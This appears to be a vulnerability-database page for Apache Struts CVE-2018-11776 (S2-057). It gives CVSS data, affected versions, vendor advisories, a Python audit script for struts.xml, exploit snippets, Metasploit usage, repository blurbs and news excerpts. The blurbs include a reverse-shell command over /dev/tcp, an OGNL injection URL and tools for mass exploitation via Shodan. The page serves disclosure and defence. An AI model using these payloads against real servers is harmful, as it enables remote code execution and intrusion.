CVE-2018-11776

Severity: HIGH (CVSS v2 base score 9.3)

Published: 22/08/2018 Updated: 16/01/2019
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
CVSS v3 Base Score: 8.1 | Impact Score: 5.9 | Exploitability Score: 2.2

Vulnerability Summary

Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts

Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (set either by the user or by a plugin such as the Convention Plugin) and either of the following holds: results are used with no namespace while their upper package has no namespace or a wildcard namespace; or a url tag is used without value and action set while its upper package has no namespace or a wildcard namespace.

A vulnerability in Apache Struts could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system. The vulnerability exists because the affected software insufficiently validates user-supplied input, allowing the use of results with no namespace value and the use of url tags with no value or action. In cases where upper actions or configurations also have no namespace or a wildcard namespace, an attacker could exploit this vulnerability by sending a request that submits malicious input to the affected application for processing. If successful, the attacker could execute arbitrary code in the security context of the affected application on the targeted system. The Apache Software Foundation has confirmed the vulnerability and released software updates.
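
The configuration conditions in the summary can be checked statically. The Python script below is an added example, not code from the advisory or the Struts project: it scans a struts.xml for packages with no or wildcard namespace that contain results without an explicit namespace. The sample XML is constructed, and the full constant key struts.mapper.alwaysSelectFullNamespace and the list of result types (redirectAction, chain, postback) are assumptions drawn from public S2-057 analyses rather than from this page.

```python
import xml.etree.ElementTree as ET

# Full key of the alwaysSelectFullNamespace setting (assumption, see lead-in).
FLAG = "struts.mapper.alwaysSelectFullNamespace"
# Result types that resolve their target from the namespace (assumption).
NAMESPACE_RESULTS = {"redirectAction", "chain", "postback"}

# Constructed sample configuration, not taken from any real application.
SAMPLE = """
<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>
  <package name="open" extends="struts-default">
    <action name="help" class="demo.Help">
      <result type="redirectAction"><param name="actionName">index</param></result>
    </action>
    <action name="safe" class="demo.Safe">
      <result type="redirectAction">
        <param name="actionName">index</param>
        <param name="namespace">/home</param>
      </result>
    </action>
  </package>
  <package name="wild" extends="struts-default" namespace="/*">
    <action name="go" class="demo.Go"><result type="chain">next</result></action>
  </package>
  <package name="pinned" extends="struts-default" namespace="/admin">
    <action name="save" class="demo.Save"><result type="postback">list</result></action>
  </package>
</struts>
"""

def full_namespace_enabled(root):
    """True if struts.xml itself switches the flag on. A plugin such as the
    Convention Plugin can also enable it, so False here is not a clean bill."""
    for const in root.iter("constant"):
        if const.get("name") == FLAG:
            return const.get("value", "").strip().lower() == "true"
    return False

def open_namespace(pkg):
    """Package has no namespace or a wildcard namespace."""
    ns = pkg.get("namespace")
    return ns is None or ns.strip() == "" or "*" in ns

def result_sets_namespace(result):
    """Result pins its own namespace through a non-empty <param name="namespace">."""
    return any(p.get("name") == "namespace" and (p.text or "").strip()
               for p in result.findall("param"))

def audit(xml_text):
    """Return the flag state and (package, action, result type) tuples to review.
    url tags in JSP templates are outside the scope of this check."""
    root = ET.fromstring(xml_text)
    findings = []
    for pkg in root.iter("package"):
        if not open_namespace(pkg):
            continue
        for holder in pkg.findall("action") + pkg.findall("global-results"):
            name = holder.get("name") or "<global-results>"
            for result in holder.findall("result"):
                if result.get("type") in NAMESPACE_RESULTS and not result_sets_namespace(result):
                    findings.append((pkg.get("name"), name, result.get("type")))
    return {"always_select_full_namespace": full_namespace_enabled(root), "findings": findings}

if __name__ == "__main__":
    print(audit(SAMPLE))
```

Any finding on an affected Struts version is a reason to upgrade; setting an explicit namespace on the package and on each flagged result removes the condition the summary describes.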

Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Access Complexity: MEDIUM
Authentication: NONE
Access Vector: NETWORK
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE

Affected Products

Vendor: Apache
Product: Struts
Versions: 2.3.1, 2.3.1.1, 2.3.1.2, 2.3.3, 2.3.4, 2.3.4.1, 2.3.5, 2.3.6, 2.3.7, 2.3.8, 2.3.9, 2.3.10, 2.3.11, 2.3.12, 2.3.13, 2.3.14, 2.3.14.1, 2.3.14.2, 2.3.14.3, 2.3.15, 2.3.15.1, 2.3.15.2, 2.3.15.3, 2.3.16, 2.3.16.1, 2.3.16.2, 2.3.16.3, 2.3.17, 2.3.19, 2.3.20, 2.3.20.1, 2.3.20.2, 2.3.20.3, 2.3.21, 2.3.22, 2.3.23, 2.3.24, 2.3.24.2, 2.3.24.3, 2.3.25, 2.3.26, 2.3.27, 2.3.28, 2.3.28.1, 2.3.29, 2.3.30, 2.3.31, 2.3.32, 2.3.33, 2.5.1, 2.5.2, 2.5.3, 2.5.4, 2.5.5, 2.5.6, 2.5.7, 2.5.8, 2.5.9, 2.5.10, 2.5.11, 2.5.13, 2.5.14, 2.5.14.1, 2.5.15, 2.5.16

Vendor Advisories

There is a vulnerability in Apache Struts to which the IBM FlashSystem™ V840 is susceptible. An exploit of that vulnerability (CVE-2018-11776) could make the system susceptible to attacks which could allow an attacker to execute arbitrary code on the system ...
A vulnerability in Apache Struts affects IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500, IBM Spectrum Virtualize Software, IBM Spectrum Virtualize for Public Cloud and IBM FlashSystem V9000 and V9100 products. Apache Struts is used in the Service Assistant GUI. The Service Assistant CLI is unaffected ...
There is a vulnerability in Apache Struts to which the IBM FlashSystem™ 840 and 900 are susceptible. An exploit of that vulnerability (CVE-2018-11776) could make the system susceptible to attacks which could allow an attacker to execute arbitrary code on the system ...
Oracle Security Alert Advisory - CVE-2018-11776. Description: This Security Alert addresses CVE-2018-11776, a vulnerability in Apache Struts 2. CVE-2018-11776 has received a CVSS v3 base score of 9.8. When the alwaysSelectFullNamespace option is enabled in a Struts 2 ...
Oracle Critical Patch Update Advisory - January 2019. Description: A Critical Patch Update is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added ...
Oracle Critical Patch Update Advisory - October 2018. Description: A Critical Patch Update is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previou ...

Exploits

#!/usr/bin/python # -*- coding: utf-8 -*- # hook-s3c (github.com/hook-s3c), @hook_s3c on twitter import sys import urllib import urllib2 import httplib def exploit(host,cmd): print "[Execute]: {}".format(cmd) ognl_payload = "${" ognl_payload += "(#_memberAccess['allowStaticMethodAccess']=true)" ognl_payload += "(#cmd='{}')"f ...
#!/usr/bin/env python3 # coding=utf-8 # ***************************************************** # struts-pwn: Apache Struts CVE-2018-11776 Exploit # Author: # Mazin Ahmed <Mazin AT MazinAhmed DOT net> # This code uses a payload from: # github.com/jas502n/St2-057 # ***************************************************** import argparse im ...
## # This module requires Metasploit: metasploit.com/download # Current source: github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE # Eschewing CmdStager for now, since the use of '\' and ';' a ...

Mailing Lists

Apache versions 2.3 up to 2.3.34 and 2.5 up to 2.5.16 remote code execution exploit ...
This Metasploit module exploits a remote code execution vulnerability in Apache Struts versions 2.3 through 2.3.4, and 2.5 through 2.5.16. Remote code execution can be performed via an endpoint that makes use of a redirect action. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* paylo ...
[CVEID]:CVE-2018-11776 [PRODUCT]:Apache Struts [VERSION]:Apache Struts 2.3 to 2.3.34 and 2.5 to 2.5.16 [PROBLEMTYPE]:Remote Code Execution [REFERENCES]:cwiki.apache.org/confluence/display/WW/S2-057 [DESCRIPTION]:Man Yue Mo from the Semmle Security Research team noticed that Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer f ...

Metasploit Modules

Apache Struts 2 Namespace Redirect OGNL Injection

This module exploits a remote code execution vulnerability in Apache Struts version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed via an endpoint that makes use of a redirect action. Note that this exploit is dependent on the version of Tomcat running on the target. Versions of Tomcat starting with 7.0.88 currently don't support payloads larger than ~7.5kb. Windows Meterpreter sessions on Tomcat >=7.0.88 are currently not supported. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.

msf > use exploit/multi/http/struts2_namespace_ognl
msf exploit(struts2_namespace_ognl) > show targets
    ...targets...
msf exploit(struts2_namespace_ognl) > set TARGET <target-id>
msf exploit(struts2_namespace_ognl) > show options
    ...show and set options...
msf exploit(struts2_namespace_ognl) > exploit

Github Repositories

CVE-2018-11776 Docker container and POC exploit written in Go. You can build your own image and run it: docker build -t your_image_name . docker container run -it --rm -p 8080:8080 your_image_name Or you just can pull the one I created with love for you: docker container run -it --rm -p 8080:8080 tuxotron/cve-2018-11776 Vulnerable application running on port 8080. To try the ex

CVE-2018-11776 Environment for CVE-2018-11776 / S2-057. Demo: Run server: $ docker run -d --hostname struts2 --name cve-2018-11776 -p 30080:8080 knqyf263/cve-2018-11776 Exploit: $ nc -l 10000 (or nc -lp 10000) $ python3 exploit.py localhost:30080 'bash -i >& /dev/tcp/192168331/10000 0>&1'

struts-pwn - CVE-2018-11776 Exploit. An exploit for Apache Struts CVE-2018-11776. Usage: Check if the vulnerability exists against a single URL: python struts-pwn.py --url 'example.com/demo/struts2-showcase/index.action' Check if the vulnerability exists against a list of URLs: python struts-pwn.py --list 'urls.txt' Exploit a single URL: python struts-pw

Vulnerable docker container for CVE-2018-11776. # docker pull bhdresh/cve-2018-11776:10 # docker run -dit -p <IP ADDRESS>:8080:8080 bhdresh/cve-2018-11776:10 PoC: PoC - 1 Request : <IP ADDRESS>:8080/struts2-showcase-2314/${333+333}/help.action Result : <IP ADDRESS>:8080/struts2-showcase-2314/666/help.action PoC - 2

CVE-2018-11776 This is part of Cved: a tool to manage vulnerable docker containers. Cved: gitlab.com/git-rep/cved Image source: github.com/cved-sources/cve-2018-11776 Image author: github.com/knqyf263/CVE-2018-11776

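CVE-2018-11776 On 23 August 2018, Apache Struts2 published its latest security bulletin: Apache Struts2 has a high-severity remote code execution vulnerability, reported by a security researcher from the Semmle Security Research team, with the identifier CVE-2018-11776 (S2-057). In Struts2, if the namespace value is not set in the XML configuration and the (Action Configuration) has no namespace or a wildcard namespace, this may lead to remote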

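Quick setup of CVE test ranges. Usage: $ git clone github.com/white3/Cveker.git Enter the directory of the CVE you want to experiment with, then $ docker-compose up -d For detailed usage see the README file under that CVE. Available CVEs (CVE ID, title): CVE-2018-11776, S2-057 remote code execution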

APACHE STRUTS SHODAN EXPLOIT POC. Author: @037. Original code can be found here. This tool takes advantage of CVE-2018-11776 and Shodan to perform mass exploitation of verified and vulnerable Apache Struts servers. Shodan search parameter has been left out to weed out any skids trying to use this tool for malicious reasons. This tool is created to be treated as a proof of conce

S2-057-CVE-2018-11776 A simple exploit for Apache Struts RCE S2-057 (CVE-2018-11776). IMPORTANT: Is provided only for educational or information purposes. Deploy test environment: git clone github.com/vulhub/vulhub cd vulhub/struts2/s2-057 docker-compose up -d Usage: exploit.py <url> <command> <action> <payload> Exam

Strutter: Proof of Concept for CVE-2018-11776, comes complete with the ability to search Shodan API for targets. CVE-2018-11776: Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when using results with no namespace and in same time, its upper action(s) have no or wildcard namespace. Same possibility when using url tag which doesn

CVE-2018-11776-Python-PoC hook-s3c (github.com/hook-s3c), @hook_s3c on twitter. Working Python test and PoC for CVE-2018-11776, originally appearing on; github.com/hook-s3c/CVE-2018-11776-Python-PoC What's going on? Man Yue Mo from Semmle has disclosed a Struts2 RCE vulnerability, delivered in a payload encoded in the URL path of a request. Versions affected are 2

Mitaka: Mitaka is an OSINT friendly Chrome extension which can: Extract & refang IoC from a block of text. E.g. example[.]com to example.com. Search / scan it on various engines. E.g. VirusTotal, urlscan.io, Censys, Shodan, etc. Features: Supported IOC types (name, desc, e.g.): text, freetext, any string(s); ip, IPv4 address, 8.8.8.8; domain, domain name, github

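St2-057 Online target environment, Enjoy! 0x01 Set up the environment with docker: github.com/vulhub/vulhub/tree/master/struts2/s2-048 docker-compose up -d 0x02 Set up the st2-057 vulnerable environment: docker exec -i -t 88fd8d560155 /bin/bash (start in the background and enter the docker container). According to the announcement at struts.apache.org/releases.html (Release, Release Date, Vulnerability, Version Notes): Struts 2.5.16, 16 March 2018, S2-057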

CVE-2018-11776 Proof of Concept exploit so I could quickly assess what sorts of protections and fixes are available. Originally found by Man Yue Mo, Semmle: semmle.com/news/apache-struts-CVE-2018-11776 Semmle had a "Apache Struts RCE - CVE-2018-11776 - PoC Exploit Demo" YouTube video up for a bit, but I believe it's gone or, at least, no longer linked to

CVE-2018-11776 (S2-057) [*] Usage: S2-057.jar <url> <action> <command> <payload (1-5)> [*] Example: S2-057.jar "example.com/struts2-showcase/" "/actionChain1.action" "whoami" 4

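Struts2-057/CVE-2018-11776: analysis of the RCE vulnerability in two versions (with EXP). Ivan@360云影实验室, 24 August 2018. 0x01 Preface: On 22 August 2018, Apache Struts2 published its latest security bulletin: Apache Struts2 has a high-severity remote code execution vulnerability (S2-057/CVE-2018-11776), discovered by Man Yue Mo, a security researcher from the Semmle Security Research team. The vulnerability arises because, in the Struts2 development framework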

Apache-Struts-v3 The script combines 3 RCE-type vulnerabilities in ApacheStruts, and it can also create a server shell. SHELL: php, function finished :); jsp, function in development. CVE ADD: CVE-2013-2251 'action:', 'redirect:' and 'redirectAction'; CVE-2017-5638 Content-Type; CVE-2018-11776 'redirect:

Apache-Struts-v3 The script combines 3 RCE-type vulnerabilities in ApacheStruts, and it can also create a server shell. SHELL: php, finished; jsp, in progress. CVE ADD: CVE-2013-2251 'action:', 'redirect:' and 'redirectAction'; CVE-2017-5638 Content-Type; CVE-2018-11776 'redirect:' and 'redirectAction

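WsylibBookRS Main content: solves the problem that the school's current library management system does not let students recommend books to the library; after usage testing, it is suitable for production use. Technologies used: spring 4.3.18, spring jdbc 4.3.18, struts 2.5.18, mysql 5.7. Development environment: eclipse, maven 3.5. Suggestions and pull requests: if you are interested in this project, please lift your noble little hand and fork it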

CVE-exploits This repository is a collection of CVE exploits.

ActiveScan++ ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead, it identifies application behaviour that may be of interest to advanced testers: Potential host header attacks (password reset poisoning, cache poisoning, DNS rebinding); Edge Side Includes; XML input handling; Suspicious input transformation (e.g.

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding

Payloads All The Things: A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! I <3 pull requests :) You can also contribute with a beer IRL or with buymeacoffee.com. Every section contains: README.md - vulnerability description and how to exploit it; Intruders - a set of files to give to Burp Intrude

Payloads All The Things: A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! I <3 pull requests :) You can also contribute with a beer IRL or with buymeacoffee.com. Every section contains the following files, you can use the _template_vuln folder to create a new chapter: README.md - vulnerability d

CVE-MyLife CVE in My Life!

Jok3r - Network and Web Pentest Framework. Jok3r is a Python3 CLI application which is aimed at helping penetration testers for network infrastructure and web black-box security tests. Its main goal is to save time on everything that can be automated during network/web pentest in order to enjoy more time on more interesting and challenging stuff. To achieve that, it combines ope

Awesome CVE PoC: A curated list of CVE PoCs. Here is a collection about Proof of Concepts of Common Vulnerabilities and Exposures, and you may also want to check out awesome-web-security. Please read the contribution guidelines before contributing. This repo is full of PoCs for CVEs. If you enjoy this awesome list and would like to support it, check out my Patreon page :

Recent Articles

Thought Patch Tuesday was a load? You gotta check out this Oracle mega-advisory, then
The Register • Shaun Nichols in San Francisco • 16 Oct 2018

And you'll definitely want to check out the libssh flaw

Oracle has released a wide-ranging security update to address more than 300 CVE-listed vulnerabilities in its various enterprise products.
The October release covers the gamut of Oracle's offerings, including its flagship Database, E-Business Suite, and Fusion Middleware packages.
For Database, the update addresses a total of three flaws. Two of the vulnerabilities (CVE-2018-3259 and CVE-2018-3299) can be remotely exploited without authentication, while the third, CVE-2018-7489, woul...

Hackers latch onto new Apache Struts megavuln to mine cryptocurrency
The Register • John Leyden • 30 Aug 2018

Underground forums alight with Struts chat, we hear

A recently uncovered critical vulnerability in Apache Struts is already being exploited in the wild.
Threat intel firm Volexity has warned that hackers are abusing the CVE-2018-11776 vuln to attack systems running Apache Struts 2, a popular open-source framework for developing applications in Java. Specifically, some nasty characters have abused the flaw while trying to install the CNRig cryptocurrency miner, researchers said.
The vulnerability appears to be easier to exploit than th...

PoC targeting critical Apache Struts bug found online
welivesecurity • Tomáš Foltýn • 28 Aug 2018

Researchers have discovered freely available proof-of-concept (PoC) code that can be used to exploit a critical security hole in the Apache Struts 2 web application framework shortly after the vulnerability was disclosed and the patch was released.
The PoC, “including a Python script that allows for easy exploitation”, was found by threat intelligence company Recorded Future on the software development platform GitHub. The firm also said that it has spotted chatter on underground forum...

Apache's latest SNAFU – Struts normal, all fscked up: Web app framework needs urgent patching
The Register • Kieren McCarthy in San Francisco • 22 Aug 2018

Paging Equifax: Time to update again, fellas

Another critical security hole has been found in Apache Struts 2, requiring an immediate update.
The vulnerability – CVE-2018-11776 – affects core code and allows miscreants to pull off remote code execution against vulnerable servers and websites. It affects all versions of Struts 2, the popular open-source framework for Java web apps.
The Apache Software Foundation has "urgently advised" anyone using Struts to update to the latest version immediately, noting that the last time ...

References